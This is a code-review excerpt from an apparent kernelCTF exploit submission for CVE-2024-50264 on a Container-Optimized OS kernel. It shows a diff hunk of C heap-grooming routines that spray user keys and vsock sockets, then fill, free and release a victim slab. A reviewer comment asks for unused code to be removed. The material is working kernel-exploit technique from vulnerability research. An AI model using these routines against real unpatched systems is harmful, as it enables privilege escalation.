pocs/linux/kernelctf/CVE-2024-50264_lts_cos/exploit/cos-109-17800.309.84/exploit.c

```diff
@@ -0,0 +1,851 @@
+		((uint64_t *)&payload)[0] = user_key_payload_counter;
+		user_key_payloads[user_key_payload_counter] = 
+			create_keyring(KEYRING_TYPE_USER, desc, &payload, KEYRING_KMALLOC_96, KEY_SPEC_PROCESS_KEYRING);
+	}
+}
+
+int *generate_spray_vvs_fd(int cnt)
+{
+	int *socks = calloc(sizeof(int), cnt);
+	for(int i=0; i<cnt; i++)
+	{
+		if((socks[i] = socket(AF_VSOCK, SOCK_SEQPACKET, 0)) < 0)
+			perror("socket");
+
+		unsigned long size = 0xeeff0011;
+		setsockopt(socks[i], AF_VSOCK, SO_VM_SOCKETS_BUFFER_MIN_SIZE, &size, sizeof(size));
+		size = 0;
+		setsockopt(socks[i], AF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE, &size, sizeof(size));
+
+		struct timeval timeout = {
+				.tv_sec = 0,
+				.tv_usec = 1,
+		};
+		if(setsockopt(socks[i], AF_VSOCK, 8, &timeout, sizeof(struct timeval)) < 0)
+			perror("setsockopt");
+	}
+	return socks;
+}
+
+void spray_vvs(int *socks, int cnt)
+{
+	struct sockaddr_vm connect_addr = {0};
+	connect_addr.svm_family = AF_VSOCK;
+	connect_addr.svm_cid = VMADDR_CID_LOCAL;
+
+	for(int i=0; i<cnt; i++)
+	{
+		connect_addr.svm_port = ++cid_port_num;
+		connect(socks[i], (struct sockaddr *)&connect_addr, sizeof(connect_addr));
+	}
+}
+
+void release_all_socks()
+{
+	for(int t=0; t<DRAIN_SLABS_CNT; t++)
+		for(int i=1; i<OBJS_PER_SLAB; i++)
+			if(i % OBJS_PER_SLAB)
+				close(sockets[i]);
+	for(int i=0; i < OBJS_PER_SLAB; i++)
+		close(sockets_child[i]);
+}
+
+void fill_victim_slab()
+{
+	struct sockaddr_vm connect_addr = {0};
+
+	struct timespec tp;
+	// clock_gettime(CLOCK_BOOTTIME , &tp);
+	// printf("[%lld.%lld] fill_victim_slab start\n", tp.tv_sec, tp.tv_nsec);
+	connect_addr.svm_family = AF_VSOCK;
+	connect_addr.svm_cid = VMADDR_CID_LOCAL;
+	for(int i=0; i<OBJS_PER_SLAB + 1; i++)
+	{
+		char desc[16] = {};
+		snprintf(desc, sizeof(desc) - 1, "-%d", ++user_key_payload_counter);
+
+		user_key_payloads[user_key_payload_counter] = 
+			create_keyring(KEYRING_TYPE_USER, desc, &payload, KEYRING_KMALLOC_96, KEY_SPEC_PROCESS_KEYRING);
+	}
+	clock_gettime(CLOCK_BOOTTIME , &tp);
+	printf("[%lld.%lld] fill_victim_slab end\n", tp.tv_sec, tp.tv_nsec);
+}
+
+void free_victim_slab()
+{
+	struct timespec tp;
+	// clock_gettime(CLOCK_BOOTTIME , &tp);
+	// printf("[%lld.%lld] free_victim_slab start\n", tp.tv_sec, tp.tv_nsec);
+	for(int i=user_key_payload_counter; i>user_key_payload_counter - (OBJS_PER_SLAB*2 + 1); i--)
+		remove_keyring(user_key_payloads[i]);
+	user_key_payload_counter -= OBJS_PER_SLAB*2 + 1;
+	clock_gettime(CLOCK_BOOTTIME , &tp);
+	printf("[%lld.%lld] free_victim_slab end\n", tp.tv_sec, tp.tv_nsec);
+}
+
+void victim_slab_to_buddy()
+{
+	struct timespec tp;
+	// clock_gettime(CLOCK_BOOTTIME , &tp);
+	// printf("[%lld.%lld] victim_slab_to_buddy start\n", tp.tv_sec, tp.tv_nsec);
+	for(int i = 0; i < user_key_payload_counter; i++)
+		remove_keyring(user_key_payloads[i]);
+	clock_gettime(CLOCK_BOOTTIME , &tp);
+	printf("[%lld.%lld] victim_slab_to_buddy end\n", tp.tv_sec, tp.tv_nsec);
+}
+
+#define SEQ_FILE_CNT 0x300
```

Comment:
This code seems to be not used, please remove it: https://google.github.io/security-research/kernelctf/style_guide#unused-code